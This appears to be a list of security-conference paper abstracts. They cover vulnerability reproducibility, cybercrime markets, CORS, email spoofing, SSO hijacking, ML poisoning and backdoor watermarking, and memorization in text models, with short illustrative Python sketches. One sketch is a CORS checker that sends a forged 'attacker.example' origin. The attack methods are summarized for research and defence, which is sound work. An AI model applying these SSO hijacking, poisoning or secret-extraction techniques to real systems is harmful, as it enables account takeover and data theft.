Today’s software systems are increasingly relying on the “power of the crowd” to identify new security vulnerabilities. And yet, it is not well understood how reproducible the crowd-reported vulnerabilities are. In this paper, we perform the first empirical analysis on a wide range of real-world security vulnerabilities (368 in total) with the goal of quantifying their reproducibility. Following a carefully controlled workflow, we organize a focused group of security analysts to carry out reproduction experiments. With 3600 man-hours spent, we obtain quantitative evidence on the prevalence of missing information in vulnerability reports and the low reproducibility of the vulnerabilities. We find that reproduction based on a single vulnerability report from a popular security forum generally fails due to incomplete information. By widely crowdsourcing the information gathering, security analysts could increase the reproduction success rate, but still face key challenges in troubleshooting the non-reproducible cases. To further explore solutions, we surveyed hackers, researchers, and engineers who have extensive domain expertise in software security (N=43). Going beyond Internet-scale crowdsourcing, we find that security professionals heavily rely on manual debugging and speculative guessing to infer the missing information. Our results suggest that there is not only a need to overhaul the way a security forum collects vulnerability reports, but also a need for automated mechanisms to collect information commonly missing from reports.

Cybercrime

Plug and Prey? Measuring the Commoditization of Cybercrime via Online Anonymous Markets

Researchers have observed the increasing commoditization of cybercrime, that is, the offering of capabilities, services, and resources as commodities by specialized suppliers in the underground economy. Commoditization enables outsourcing, thus lowering entry barriers for aspiring criminals, and potentially driving further growth in cybercrime. While there is evidence in the literature of specific examples of cybercrime commoditization, the overall phenomenon is much less understood. Which parts of cybercrime value chains are successfully commoditized, and which are not? What kind of revenue do criminal business-to-business (B2B) services generate and how fast are they growing?

We use longitudinal data from eight online anonymous marketplaces over six years, from the original Silk Road to AlphaBay, and track the evolution of commoditization on these markets. We develop a conceptual model of the value chain components for dominant criminal business models. We then identify the market supply for these components over time. We find evidence of commoditization in most components, but the outsourcing options are highly restricted and transaction volume is often modest. Cash-out services feature the most listings and generate the largest revenue. Consistent with behavior observed in the context of narcotic sales, we also find a significant amount of revenue in retail cybercrime, i.e., business-to-consumer (B2C) rather than business-to-business. We conservatively estimate the overall revenue for cybercrime commodities on online anonymous markets to be at least US $15M between 2011 and 2017. While there is growth, commoditization is a spottier phenomenon than previously assumed.

Reading Thieves’ Cant: Automatically Identifying and Understanding Dark Jargons from Cybercrime Marketplaces

Underground communication is invaluable for understanding cybercrimes. However, it is often obfuscated by the extensive use of dark jargons, innocent-looking terms like “popcorn” that serve sinister purposes (buying/selling drugs, seeking crimeware, etc.). Discovery and understanding of these jargons have so far relied on manual effort, which is error-prone and cannot catch up with the fast-evolving underground ecosystem. In this paper, we present the first technique, called Cantreader, to automatically detect and understand dark jargon. Our approach employs a neural-network based embedding technique to analyze the semantics of words, detecting those whose contexts in legitimate documents are significantly different from those in underground communication. For this purpose, we enhance the existing word embedding model to support semantic comparison across good and bad corpora, which leads to the detection of dark jargons. To further understand them, our approach utilizes projection learning to identify a jargon’s hypernym that sheds light on its true meaning when used in underground communication. Running Cantreader over one million traces collected from four underground forums, our approach automatically reported 3,462 dark jargons and their hypernyms, including 2,491 never known before. The study further reveals how these jargons are used (by 25% of the traces) and evolve and how they help cybercriminals communicate on legitimate forums.
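
The underlying signal is simple to demo: a word whose embedding neighborhood differs sharply between a legitimate corpus and an underground corpus is a jargon candidate. A toy gensim sketch (the paper trains a single modified embedding model spanning both corpora; training two separate models and comparing neighbor sets, as below, only approximates that idea):

```python
from gensim.models import Word2Vec

# Tiny made-up corpora; real inputs would be forum and reference text.
legit = [["popcorn", "movie", "butter", "snack"]] * 50
dark  = [["popcorn", "gram", "vendor", "stealth", "shipping"]] * 50

m_legit = Word2Vec(legit, vector_size=32, min_count=1, seed=0, workers=1)
m_dark  = Word2Vec(dark,  vector_size=32, min_count=1, seed=0, workers=1)

def neighbor_shift(word, k=3):
    """1.0 = the word's nearest neighbors are completely different."""
    n1 = {w for w, _ in m_legit.wv.most_similar(word, topn=k)}
    n2 = {w for w, _ in m_dark.wv.most_similar(word, topn=k)}
    return 1 - len(n1 & n2) / k

print("popcorn shift:", neighbor_shift("popcorn"))
```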

Schrödinger’s RAT: Profiling the Stakeholders in the Remote Access Trojan Ecosystem

Remote Access Trojans (RATs) are a class of malware that give an attacker direct, interactive access to a victim’s personal computer, allowing the attacker to steal private data stored on the machine, spy on the victim in real-time using the camera and microphone, and interact directly with the victim via a dialog box. RATs have been used for surveillance, information theft, and extortion of victims.

In this work, we report on the attackers and victims for two popular RATs, njRAT and DarkComet. Using the malware repository VirusTotal, we find all instances of these RATs and identify the domain names of the controllers. We then register those domains that have expired and direct them to our measurement infrastructure, allowing us to determine the victims of these campaigns. We investigated several techniques for identifying network scanners and sandbox executions of the malware samples in order to filter out apparent infections that are not real victims of the campaign. Our results show that over 99% of the 828,137 IP addresses that connected to our sinkhole are likely not real victims. We report on the number of victims, how long RAT campaigns remain active, and the geographic relationship between victims and attackers.

The aftermath of a crypto-ransomware attack at a large academic institution

In 2016, a large North American university was subject to a significant crypto-ransomware attack and did not pay the ransom. We conducted a survey with 150 respondents and interviews with 30 affected students, staff, and faculty in the immediate aftermath to understand their experiences during the attack and the recovery process. We provide analysis of the technological, productivity, and personal and social impact of ransomware attacks, including previously unaccounted secondary costs. We suggest strategies for comprehensive cyber-response plans that include human factors, and highlight the importance of communication. We conclude with a Ransomware Process for Organizations diagram summarizing the additional contributing factors beyond those relevant to individual infections.

Web and Network Measurement

We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS

The default Same Origin Policy essentially restricts access of cross-origin network resources to be “write-only”. However, many web applications require “read” access to contents from a different origin, so developers have come up with workarounds, such as JSON-P, to bypass the default Same Origin Policy restriction. Such ad-hoc workarounds leave a number of inherent security issues. CORS (cross-origin resource sharing) is a more disciplined mechanism supported by all web browsers to handle cross-origin network accesses. This paper presents our empirical study of the real-world uses of CORS. We find that the design, implementation, and deployment of CORS are subject to a number of new security issues: 1) CORS relaxes the cross-origin “write” privilege in a number of subtle ways that are problematic in practice; 2) CORS brings new forms of risky trust dependencies into web interactions; 3) CORS is generally not well understood by developers, possibly due to its inexpressive policy and its complex and subtle interactions with other web mechanisms, leading to various misconfigurations. Finally, we propose protocol simplifications and clarifications to mitigate the security problems uncovered in our study. Some of our proposals have been adopted by both the CORS specification and major browsers.
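
Misconfigurations of the kind the paper measures can be probed in a few lines: send a forged Origin and check whether the server reflects it while also allowing credentials, the classic dangerous combination. My sketch with the requests library, not the authors' tooling:

```python
import requests

def check_cors(url, evil_origin="https://attacker.example"):
    r = requests.get(url, headers={"Origin": evil_origin}, timeout=10)
    acao = r.headers.get("Access-Control-Allow-Origin", "")
    acac = r.headers.get("Access-Control-Allow-Credentials", "")
    if acao == evil_origin and acac.lower() == "true":
        return "reflects arbitrary origins WITH credentials (high risk)"
    if acao == "*":
        return "wildcard origin (browsers block credentials here)"
    return "no obviously risky CORS policy"

print(check_cors("https://example.com"))
```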

End-to-End Measurements of Email Spoofing Attacks

Spear phishing has been a persistent threat to users and organizations, and yet email providers still face key challenges to authenticate incoming emails. As a result, attackers can apply spoofing techniques to impersonate a trusted entity and conduct highly deceptive phishing attacks. In this work, we study email spoofing to answer three key questions: (1) How do email providers detect and handle forged emails? (2) Under what conditions can forged emails penetrate the defense to reach the user inbox? (3) Once a forged email gets in, how do email providers warn users, and is the warning truly effective?

We answer these questions by conducting an end-to-end measurement on 35 popular email providers and examining user reactions to spoofing through a real-world spoofing/phishing test. Our key findings are threefold. First, we observe that most email providers have the necessary protocols to detect spoofing, but still allow forged emails to reach the user inbox (e.g., Yahoo Mail, iCloud, Gmail). Second, once a forged email gets in, most email providers have no warning for users, particularly on mobile email apps. Some providers (e.g., Gmail Inbox) even have misleading UIs that make the forged email look authentic. Third, a few email providers (9/35) have implemented visual security cues on unverified emails. Our phishing experiment shows that security cues have a positive impact on reducing risky user actions, but cannot eliminate the risk. Our study reveals a major miscommunication between email providers and end-users. Improvements at both ends (server-side protocols and UIs) are needed to bridge the gap.

Who Is Answering My Queries: Understanding and Characterizing Interception of the DNS Resolution Path

DNS queries from end users are handled by recursive DNS servers for scalability. For convenience, Internet Service Providers (ISPs) assign recursive servers for their clients automatically when the clients choose the default network settings. But users should also have the flexibility to use their preferred recursive servers, like public DNS servers. This kind of trust, however, can be broken by hidden interception of the DNS resolution path (which we term DNSIntercept). Specifically, on-path devices could spoof the IP addresses of user-specified DNS servers and intercept the DNS queries surreptitiously, introducing privacy and security issues.

In this paper, we perform a large-scale analysis of on-path DNS interception and shed light on its scope and characteristics. We design novel approaches to detect DNS interception and leverage 148,478 residential and cellular IP addresses around the world for analysis. As a result, we find that 259 of the 3,047 ASes (8.5%) that we inspect exhibit DNS interception behavior, including large providers, such as China Mobile. Moreover, we find that the DNS servers of the ASes which intercept requests may use outdated vulnerable software (deprecated before 2009) and lack security-related functionality, such as handling DNSSEC requests. Our work highlights the issues around on-path DNS interception and provides new insights for addressing such issues.
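
The detection idea can be sketched as follows, assuming you control the authoritative server for a probe domain (probe.example below is a placeholder) and can read its query logs: send a uniquely labeled query to a well-known public resolver's IP; if the authoritative logs show some other resolver asking for that label, an on-path device intercepted and re-originated the query. A dnspython sketch:

```python
import uuid
import dns.message
import dns.query

def probe(public_resolver_ip="8.8.8.8"):
    # A unique label ties this probe to one entry in the authoritative logs.
    name = f"{uuid.uuid4().hex}.probe.example."
    q = dns.message.make_query(name, "A")
    dns.query.udp(q, public_resolver_ip, timeout=5)
    return name  # later: check which source IP asked for this name
```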

End-Users Get Maneuvered: Empirical Analysis of Redirection Hijacking in Content Delivery Networks

The success of Content Delivery Networks (CDNs) relies on the mapping system that leverages dynamically generated DNS records to distribute a client’s request to a proximal server for optimal content delivery. However, the mapping system is vulnerable to malicious hijacks, as (1) it is very difficult to provide pre-computed DNSSEC signatures for dynamically generated records and (2) even with DNSSEC enabled, DNSSEC itself is vulnerable to replay attacks. By leveraging crafted but legitimate mappings between end-users and edge servers, adversaries can hijack a CDN’s request redirection and nullify the benefits offered by CDNs, such as proximal access, load balancing, and DoS protection, while remaining undetectable by existing security practices. In this paper, we investigate the security implications of dynamic mapping that remain understudied in the security and CDN communities. We perform a characterization of CDNs’ service delivery and assess this fundamental vulnerability in DNS-based CDNs in the wild. We demonstrate that DNSSEC is ineffective to address this problem, even with the newly adopted ECDSA that is capable of achieving live signing. We then discuss practical countermeasures against such manipulation.

Attacks on Systems That Learn

With Great Training Comes Great Vulnerability: Practical Attacks against Transfer Learning

Transfer learning is a powerful approach that allows users to quickly build accurate deep-learning (Student) models by “learning” from centralized (Teacher) models pretrained with large datasets, e.g. Google’s InceptionV3. We hypothesize that the centralization of model training increases their vulnerability to misclassification attacks leveraging knowledge of publicly accessible Teacher models. In this paper, we describe our efforts to understand and experimentally validate such attacks in the context of image recognition. We identify techniques that allow attackers to associate Student models with their Teacher counterparts, and launch highly effective misclassification attacks on black-box Student models. We validate this on widely used Teacher models in the wild. Finally, we propose and evaluate multiple approaches for defense, including a neuron-distance technique that successfully defends against these attacks while also obfuscating the link between Teacher and Student models.

When Does Machine Learning FAIL? Generalized Transferability for Evasion and Poisoning Attacks

Recent results suggest that attacks against supervised machine learning systems are quite effective, while defenses are easily bypassed by new attacks. However, the specifications for machine learning systems currently lack precise adversary definitions, and the existing attacks make diverse, potentially unrealistic assumptions about the strength of the adversary who launches them. We propose the FAIL attacker model, which describes the adversary’s knowledge and control along four dimensions. Our model allows us to consider a wide range of weaker adversaries who have limited control and incomplete knowledge of the features, learning algorithms and training instances utilized. To evaluate the utility of the FAIL model, we consider the problem of conducting targeted poisoning attacks in a realistic setting: the crafted poison samples must have clean labels, must be individually and collectively inconspicuous, and must exhibit a generalized form of transferability, defined by the FAIL model. By taking these constraints into account, we design StingRay, a targeted poisoning attack that is practical against 4 machine learning applications, which use 3 different learning algorithms, and can bypass 2 existing defenses. Conversely, we show that a prior evasion attack is less effective under generalized transferability. Such attack evaluations, under the FAIL adversary model, may also suggest promising directions for future defenses.

Web Authentication

Vetting Single Sign-On SDK Implementations via Symbolic Reasoning

Encouraged by the rapid adoption of Single Sign-On (SSO) technology in web services, mainstream identity providers, such as Facebook and Google, have developed Software Development Kits (SDKs) to facilitate the implementation of SSO for 3rd-party application developers. These SDKs have become a critical foundation for web services. Despite its importance, little effort has been devoted to a systematic testing on the implementations of SSO SDKs, especially in the public domain. In this paper, we design and implement S3KVetter (Single-Sign-on SdK Vetter), an automated, efficient testing tool, to check the logical correctness and identify vulnerabilities of SSO SDKs. To demonstrate the efficacy of S3KVetter, we apply it to test ten popular SSO SDKs which enjoy millions of downloads by application developers. Among these carefully engineered SDKs, S3KVetter has surprisingly discovered 7 classes of logic flaws, 4 of which were previously unknown. These vulnerabilities can lead to severe consequences, ranging from the sniffing of user activities to the hijacking of user accounts.

O Single Sign-Off, Where Art Thou? An Empirical Analysis of Single Sign-On Account Hijacking and Session Management on the Web

Single Sign-On (SSO) allows users to effortlessly navigate the Web and obtain a personalized experience without the hassle of creating and managing accounts across different services. Due to its proliferation, user accounts in identity providers are now keys to the kingdom and pose a massive security risk. In this paper we investigate the security implications of SSO and offer an in-depth analysis of account hijacking in the modern Web. Our experimental methodology explores multiple aspects of the attack workflow and reveals significant variance in how services deploy SSO. We first present a cookie hijacking attack for Facebook that results in complete account takeover, which in turn can be used to compromise accounts in services that support SSO. Next we introduce several novel attacks that leverage SSO for maintaining long-term control of user accounts. We empirically evaluate our attacks against 95 major web and mobile services and demonstrate their severity and stealthy nature. Next we explore what session and account management options are available to users after an account is compromised. Our findings highlight the inherent limitations of prevalent SSO schemes as most services lack the functionality that would allow users to remediate an account takeover. This is exacerbated by the scale of SSO coverage, rendering manual remediation attempts a futile endeavor. To remedy this we propose Single Sign-Off, an extension to OpenID Connect for universally revoking access to all the accounts associated with the hijacked identity provider account.

WPSE: Fortifying Web Protocols via Browser-Side Security Monitoring

We present WPSE, a browser-side security monitor for web protocols designed to ensure compliance with the intended protocol flow, as well as confidentiality and integrity properties of messages. We formally prove that WPSE is expressive enough to protect web applications from a wide range of protocol implementation bugs and web attacks. We discuss concrete examples of attacks which can be prevented by WPSE on OAuth 2.0 and SAML 2.0, including a novel attack on the Google implementation of SAML 2.0 which we discovered by formalizing the protocol specification in WPSE. Moreover, we use WPSE to carry out an extensive experimental evaluation of OAuth 2.0 in the wild. Out of 90 tested websites, we identify security flaws in 55 websites (61.1%), including new critical vulnerabilities introduced by tracking libraries such as Facebook Pixel, all of which are fixable by WPSE. Finally, we show that WPSE works flawlessly on 83 websites (92.2%), with the 7 compatibility issues being caused by custom implementations deviating from the OAuth 2.0 specification, one of which introduces a critical vulnerability.

Man-in-the-Machine: Exploiting Ill-Secured Communication Inside the Computer

Operating systems provide various inter-process communication (IPC) mechanisms. Software applications typically use IPC for communication between front-end and back-end components, which run in different processes on the same computer. This paper studies the security of how the IPC mechanisms are used in PC, Mac and Linux software. We describe attacks where a nonprivileged process impersonates the IPC communication endpoints. The attacks are closely related to impersonation and man-in-the-middle attacks on computer networks but take place inside one computer. The vulnerable IPC methods are ones where a server process binds to a name or address and waits for client communication. Our results show that application developers are often unaware of the risks and secure practices in using IPC. We find attacks against several security-critical applications including password managers and hardware tokens, in which another user’s process is able to steal and misuse sensitive data such as the victim’s credentials. The vulnerabilities can be exploited in enterprise environments with centralized access control that gives multiple users remote or local login access to the same host. Computers with guest accounts and shared computers at home are similarly vulnerable.

Neural Networks

Formal Security Analysis of Neural Networks using Symbolic Intervals

Due to the increasing deployment of Deep Neural Networks (DNNs) in real-world security-critical domains including autonomous vehicles and collision avoidance systems, formally checking security properties of DNNs, especially under different attacker capabilities, is becoming crucial. Most existing security testing techniques for DNNs try to find adversarial examples without providing any formal security guarantees about the non-existence of such adversarial examples. Recently, several projects have used different types of Satisfiability Modulo Theory (SMT) solvers to formally check security properties of DNNs. However, all of these approaches are limited by the high overhead caused by the solver.

In this paper, we present a new direction for formally checking security properties of DNNs without using SMT solvers. Instead, we leverage interval arithmetic to compute rigorous bounds on the DNN outputs. Our approach, unlike existing solver-based approaches, is easily parallelizable. We further present symbolic interval analysis along with several other optimizations to minimize overestimations of output bounds.

We design, implement, and evaluate our approach as part of ReluVal, a system for formally checking security properties of Relu-based DNNs. Our extensive empirical results show that ReluVal outperforms Reluplex, a state-of-the-art solver-based system, by 200 times on average. On a single 8-core machine without GPUs, within 4 hours, ReluVal is able to verify a security property that Reluplex deemed inconclusive due to timeout after running for more than 5 days. Our experiments demonstrate that symbolic interval analysis is a promising new direction towards rigorously analyzing different security properties of DNNs.
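
The starting point is plain interval arithmetic pushed through the network layer by layer; ReluVal's symbolic intervals and input bisection then fight the over-approximation this naive version suffers from. A minimal numpy sketch of the naive version:

```python
import numpy as np

def interval_forward(lo, hi, layers):
    """Propagate the input box [lo, hi] through ReLU layers given as (W, b)."""
    for i, (W, b) in enumerate(layers):
        Wp, Wn = np.maximum(W, 0), np.minimum(W, 0)
        # Sound bounds for an affine map: positive weights carry lo->lo,
        # hi->hi; negative weights swap them.
        lo, hi = Wp @ lo + Wn @ hi + b, Wp @ hi + Wn @ lo + b
        if i < len(layers) - 1:              # ReLU (monotone) on hidden layers
            lo, hi = np.maximum(lo, 0), np.maximum(hi, 0)
    return lo, hi

layers = [(np.array([[1.0, -1.0], [0.5, 2.0]]), np.zeros(2)),
          (np.array([[1.0, 1.0]]), np.zeros(1))]
lo, hi = interval_forward(np.array([0.0, 0.0]), np.array([1.0, 1.0]), layers)
print(lo, hi)  # rigorous (if loose) output bounds for the whole input box
```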

Turning Your Weakness Into a Strength: Watermarking Deep Neural Networks by Backdooring

Deep Neural Networks have recently gained lots of success after enabling several breakthroughs in notoriously challenging problems. Training these networks is computationally expensive and requires vast amounts of training data. Selling such pre-trained models can, therefore, be a lucrative business model. Unfortunately, once the models are sold they can be easily copied and redistributed. To avoid this, a tracking mechanism to identify models as the intellectual property of a particular vendor is necessary. In this work, we present an approach for watermarking Deep Neural Networks in a black-box way. Our scheme works for general classification tasks and can easily be combined with current learning algorithms. We show experimentally that such a watermark has no noticeable impact on the primary task that the model is designed for and evaluate the robustness of our proposal against a multitude of practical attacks. Moreover, we provide a theoretical analysis, relating our approach to previous work on backdooring.
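
Black-box verification of such a watermark reduces to a hypothesis test: an innocent model should agree with the deliberately mislabeled trigger set only by chance. A sketch (predict and the trigger set are caller-supplied; the significance threshold is illustrative):

```python
import math

def watermark_present(predict, trigger_set, n_classes=10, alpha=1e-6):
    """Reject the 'no watermark' hypothesis if the model matches the
    trigger labels far more often than 1/n_classes chance would allow."""
    hits = sum(predict(x) == y for x, y in trigger_set)
    n, p = len(trigger_set), 1.0 / n_classes
    # P[Binomial(n, p) >= hits], computed directly for small n.
    tail = sum(math.comb(n, k) * p**k * (1-p)**(n-k) for k in range(hits, n+1))
    return tail < alpha

# Toy demo: a "model" that memorized the trigger labels passes the test.
fake_triggers = [(i, i % 10) for i in range(25)]
print(watermark_present(lambda x: x % 10, fake_triggers))  # True
```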

A4NT: Author Attribute Anonymity by Adversarial Training of Neural Machine Translation

Text-based analysis methods enable an adversary to reveal privacy-relevant author attributes such as gender and age, and can identify the text’s author. Such methods can compromise the privacy of an anonymous author even when the author tries to remove privacy-sensitive content. In this paper, we propose an automatic method, called the Adversarial Author Attribute Anonymity Neural Translation (A4NT), to combat such text-based adversaries. Unlike prior works on obfuscation, we propose a system that is fully automatic and learns to perform obfuscation entirely from the data. This allows us to easily apply the A4NT system to obfuscate different author attributes. We propose a sequence-to-sequence language model, inspired by machine translation, and an adversarial training framework to design a system which learns to transform the input text to obfuscate the author attributes without paired data. We also propose and evaluate techniques to impose constraints on our A4NT model to preserve the semantics of the input text. A4NT learns to make minimal changes to the input to successfully fool author attribute classifiers, while preserving the meaning of the input text. Our experiments on two datasets and three settings show that the proposed method is effective in fooling the attribute classifiers and thus improves the anonymity of authors.

GAZELLE: A Low Latency Framework for Secure Neural Network Inference

The growing popularity of cloud-based machine learning raises natural questions about the privacy guarantees that can be provided in such settings. Our work tackles this problem in the context of prediction-as-a-service wherein a server has a convolutional neural network (CNN) trained on its private data and wishes to provide classifications on clients’ private images. Our goal is to build efficient protocols whereby the client can acquire the classification result without revealing their input to the server, while guaranteeing the privacy of the server’s neural network.

To this end, we design Gazelle, a scalable and low-latency system for secure neural network inference, using an intricate combination of homomorphic encryption and traditional two-party computation techniques (such as garbled circuits). Gazelle makes three contributions. First, we design the Gazelle homomorphic encryption library which provides fast algorithms for basic homomorphic operations such as SIMD (single instruction multiple data) addition, SIMD multiplication and ciphertext permutation. Second, we implement the Gazelle homomorphic linear algebra kernels which map neural network layers to optimized homomorphic matrix-vector multiplication and convolution routines. Third, we design optimized encryption switching protocols which seamlessly convert between homomorphic and garbled circuit encodings to enable implementation of complete neural network inference.

We evaluate our protocols on benchmark neural networks trained on the MNIST and CIFAR-10 datasets and show that Gazelle outperforms the best existing systems such as MiniONN (ACM CCS 2017) and Chameleon (Crypto Eprint 2017/1164) by 20–30x in online runtime. When compared with fully homomorphic approaches like CryptoNets (ICML 2016), we demonstrate three orders of magnitude faster online run-time.

2019 Technical Sessions dblp

Protecting Users Everywhere

Computer Security and Privacy in the Interactions Between Victim Service Providers and Human Trafficking Survivors

A victim service provider, or VSP, is a crucial partner in a human trafficking survivor’s recovery. VSPs provide or connect survivors to services such as medical care, legal services, employment opportunities, etc. In this work, we study VSP-survivor interactions from a computer security and privacy perspective. Through 17 semi-structured interviews with staff members at VSPs and survivors of trafficking, we surface the role technology plays in VSP-survivor interactions as well as related computer security and privacy concerns and mitigations. Our results highlight various tensions that VSPs must balance, including building trust with their clients (often by giving them as much autonomy as possible) while attempting to guide their use of technology to mitigate risks around revictimization. We conclude with concrete recommendations for computer security and privacy technologists who wish to partner with VSPs to support and empower trafficking survivors.

Clinical Computer Security for Victims of Intimate Partner Violence

Digital insecurity in the face of targeted, persistent attacks increasingly leaves victims in debilitating or even life-threatening situations. We propose an approach to helping victims, what we call clinical computer security, and explore it in the context of intimate partner violence (IPV). IPV is widespread and abusers exploit technology to track, harass, intimidate, and otherwise harm their victims. We report on the iterative design, refinement, and deployment of a consultation service that we created to help IPV victims obtain in-person security help from a trained technologist. To do so we created and tested a range of new technical and non-technical tools that systematize the discovery and investigation of the complicated, multimodal digital attacks seen in IPV. An initial field study with 44 IPV survivors showed how our procedures and tools help victims discover account compromise, exploitable misconfigurations, and potential spyware.

Evaluating the Contextual Integrity of Privacy Regulation: Parents’ IoT Toy Privacy Norms Versus COPPA

Increased concern about data privacy has prompted new and updated data protection regulations worldwide. However, there has been no rigorous way to test whether the practices mandated by these regulations actually align with the privacy norms of affected populations. Here, we demonstrate that surveys based on the theory of contextual integrity provide a quantifiable and scalable method for measuring the conformity of specific regulatory provisions to privacy norms. We apply this method to the U.S. Children’s Online Privacy Protection Act (COPPA), surveying 195 parents and providing the first data that COPPA’s mandates generally align with parents’ privacy expectations for Internet-connected “smart” children’s toys. Nevertheless, variations in the acceptability of data collection across specific smart toys, information types, parent ages, and other conditions emphasize the importance of detailed contextual factors to privacy norms, which may not be adequately captured by COPPA.

Secure Multi-User Content Sharing for Augmented Reality Applications

Augmented reality (AR), which overlays virtual content on top of the user’s perception of the real world, has now begun to enter the consumer market. Besides smartphone platforms, early-stage head-mounted displays such as the Microsoft HoloLens are under active development. Many compelling uses of these technologies are multi-user: e.g., in-person collaborative tools, multiplayer gaming, and telepresence. While prior work on AR security and privacy has studied potential risks from AR applications, new risks will also arise among multiple human users. In this work, we explore the challenges that arise in designing secure and private content sharing for multi-user AR. We analyze representative application case studies and systematize design goals for security and functionality that a multi-user AR platform should support. We design an AR content sharing control module that achieves these goals and build a prototype implementation (ShareAR) for the HoloLens. This work builds foundations for secure and private multi-user AR interactions.

Understanding and Improving Security and Privacy in Multi-User Smart Homes: A Design Exploration and In-Home User Study

Smart homes face unique security, privacy, and usability challenges because they are multi-user, multi-device systems that affect the physical environment of all inhabitants of the home. Current smart home technology is often not well designed for multiple users, sometimes lacking basic access control and other affordances for making the system intelligible and accessible for all users. While prior work has shed light on the problems and needs of smart home users, it is not obvious how to design and build solutions. Such questions have certainly not been answered for challenging adversarial situations (e.g., domestic abuse), but we observe that they have not even been answered for tensions in otherwise functional, non-adversarial households. In this work, we explore user behaviors, needs, and possible solutions to multi-user security and privacy issues in generally non-adversarial smart homes. Based on design principles grounded in prior work, we built a prototype smart home app that includes concrete features such as location-based access controls, supervisory access controls, and activity notifications, and we tested our prototype though a month-long in-home user study with seven households. From the results of the user study, we re-evaluate our initial design principles, we surface user feedback on security and privacy features, and we identify challenges and recommendations for smart home designers and researchers.

Machine Learning Applications

The Secret Sharer: Evaluating and Testing Unintended Memorization in Neural Networks

This paper describes a testing methodology for quantitatively assessing the risk that rare or unique training-data sequences are unintentionally memorized by generative sequence models—a common type of machine-learning model. Because such models are sometimes trained on sensitive data (e.g., the text of users’ private messages), this methodology can benefit privacy by allowing deep-learning practitioners to select means of training that minimize such memorization.

In experiments, we show that unintended memorization is a persistent, hard-to-avoid issue that can have serious consequences. Specifically, for models trained without consideration of memorization, we describe new, efficient procedures that can extract unique, secret sequences, such as credit card numbers. We show that our testing strategy is a practical and easy-to-use first line of defense, e.g., by describing its application to quantitatively limit data exposure in Google’s Smart Compose, a commercial text-completion neural network trained on millions of users’ email messages.
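
The paper's exposure metric is compact enough to sketch: insert a random canary during training, then measure how highly the trained model ranks it against random alternatives; exposure = log2(#candidates) - log2(rank of the canary). model_logprob below is a stand-in for a real sequence model's scoring function:

```python
import math, random

def exposure(canary, candidates, model_logprob):
    scores = sorted(candidates + [canary], key=model_logprob, reverse=True)
    rank = scores.index(canary) + 1
    return math.log2(len(candidates) + 1) - math.log2(rank)

# Toy stand-in "model" that memorized one digit string.
random.seed(0)
memorized = "271828"
model_logprob = lambda s: -sum(a != b for a, b in zip(s, memorized))
pool = ["".join(random.choices("0123456789", k=6)) for _ in range(9999)]
print(exposure(memorized, pool, model_logprob))  # high exposure ~ memorized
```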

Improving Robustness of ML Classifiers against Realizable Evasion Attacks Using Conserved Features

Machine learning (ML) techniques are increasingly common in security applications, such as malware and intrusion detection. However, ML models are often susceptible to evasion attacks, in which an adversary makes changes to the input (such as malware) in order to avoid being detected. A conventional approach to evaluate ML robustness to such attacks, as well as to design robust ML, is by considering simplified feature-space models of attacks, where the attacker changes ML features directly to effect evasion, while minimizing or constraining the magnitude of this change. We investigate the effectiveness of this approach to designing robust ML in the face of attacks that can be realized in actual malware (realizable attacks). We demonstrate that in the context of structure-based PDF malware detection, such techniques appear to have limited effectiveness, but they are effective with content-based detectors. In either case, we show that augmenting the feature space models with conserved features (those that cannot be unilaterally modified without compromising malicious functionality) significantly improves performance. Finally, we show that feature space models enable generalized robustness when faced with a variety of realizable attacks, as compared to classifiers which are tuned to be robust to a specific realizable attack.

ALOHA: Auxiliary Loss Optimization for Hypothesis Augmentation

Malware detection is a popular application of Machine Learning for Information Security (ML-Sec), in which an ML classifier is trained to predict whether a given file is malware or benignware. Parameters of this classifier are typically optimized such that outputs from the model over a set of input samples most closely match the samples’ true malicious/benign (1/0) target labels. However, there are often a number of other sources of contextual metadata for each malware sample, beyond an aggregate malicious/benign label, including multiple labeling sources and malware type information (e.g. ransomware, trojan, etc.), which we can feed to the classifier as auxiliary prediction targets. In this work, we fit deep neural networks to multiple additional targets derived from metadata in a threat intelligence feed for Portable Executable (PE) malware and benignware, including a multi-source malicious/benign loss, a count loss on multi-source detections, and a semantic malware attribute tag loss. We find that incorporating multiple auxiliary loss terms yields a marked improvement in performance on the main detection task. We also demonstrate that these gains likely stem from a more informed neural network representation and are not due to a regularization artifact of multi-target learning. Our auxiliary loss architecture yields a significant reduction in detection error rate (false negatives) of 42.6% at a false positive rate (FPR) of 10^-3 when compared to a similar model with only one target, and a decrease of 53.8% at 10^-5 FPR.
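
The architecture pattern is a shared trunk with one main head plus auxiliary heads, trained on a weighted sum of losses. A minimal PyTorch sketch (layer sizes and loss weights are illustrative, not the paper's):

```python
import torch
import torch.nn as nn

class AuxLossNet(nn.Module):
    def __init__(self, n_features=1024, n_sources=5, n_tags=10):
        super().__init__()
        self.trunk = nn.Sequential(nn.Linear(n_features, 256), nn.ReLU())
        self.main = nn.Linear(256, 1)              # malicious/benign
        self.sources = nn.Linear(256, n_sources)   # per-vendor verdicts
        self.tags = nn.Linear(256, n_tags)         # attribute tags
    def forward(self, x):
        h = self.trunk(x)
        return self.main(h), self.sources(h), self.tags(h)

net, bce = AuxLossNet(), nn.BCEWithLogitsLoss()
x = torch.randn(8, 1024)                           # dummy batch
y_main = torch.randint(0, 2, (8, 1)).float()
y_src = torch.randint(0, 2, (8, 5)).float()
y_tag = torch.randint(0, 2, (8, 10)).float()

m, s, t = net(x)
loss = bce(m, y_main) + 0.1 * bce(s, y_src) + 0.1 * bce(t, y_tag)
loss.backward()  # auxiliary gradients shape the shared representation
```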

Why Do Adversarial Attacks Transfer? Explaining Transferability of Evasion and Poisoning Attacks

Transferability captures the ability of an attack against a machine-learning model to be effective against a different, potentially unknown, model. Empirical evidence for transferability has been shown in previous work, but the underlying reasons why an attack transfers or not are not yet well understood. In this paper, we present a comprehensive analysis aimed to investigate the transferability of both test-time evasion and training-time poisoning attacks. We provide a unifying optimization framework for evasion and poisoning attacks, and a formal definition of transferability of such attacks. We highlight two main factors contributing to attack transferability: the intrinsic adversarial vulnerability of the target model, and the complexity of the surrogate model used to optimize the attack. Based on these insights, we define three metrics that impact an attack’s transferability. Interestingly, our results derived from theoretical analysis hold for both evasion and poisoning attacks, and are confirmed experimentally using a wide range of linear and non-linear classifiers and datasets.

Stack Overflow Considered Helpful! Deep Learning Security Nudges Towards Stronger Cryptography

